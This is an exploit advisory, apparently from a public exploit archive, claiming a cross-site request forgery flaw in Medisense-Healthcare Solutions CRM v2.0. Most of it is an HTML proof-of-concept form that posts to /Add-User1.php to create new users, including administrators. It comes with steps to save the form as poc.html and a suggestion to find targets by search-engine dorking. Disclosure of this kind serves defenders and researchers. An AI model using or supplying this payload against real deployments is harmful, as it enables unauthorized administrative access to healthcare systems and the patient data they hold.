Medisense-Healthcare Solutions CRM version 2.0 suffers from a cross site request forgery vulnerability.
01f668cbe090f4fc42a294a8bc4e25ae5e25e8e14835dab57cbbc94d04815623
====================================================================================================================================
| # Title : Medisense-Healthcare Solutions CRM v2.0 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |
| # Vendor : https://medisensecrm.com |
| # Dork : |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] The following html code create a new admin .
[+] infected file : /Add-User1.php .
[+] save code as poc.html .
<h2>Add New User</h2>
<form name="frmCreateuser" method="POST" action="https://127.0.0.1/medisensecrmcom/Add-User1.php" onsubmit="return createUser()">
<h3>User Name :<input type="text" name="txtuser" class="txtfield fr"/></h3>
<h3>Password :<input type="password" name="txtNewPass" class="txtfield fr"/></h3>
<h3>Re-type Password :<input type="password" name="txtVerifyPass" class="txtfield fr"/></h3>
<h3>USer Type:<label class="fr" ><input type="radio" name="usertype" class="rdBtn fr" value="1" checked/>Executive</label><br><label class="fr">
<input type="radio" name="usertype" value="0" class="rdBtn fr"/>Admin</label></h3>
<input type="submit" name="cmdSubmit" value="SUBMIT" class="submitBtn" />
</div>
</form>
</div>
</div>
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================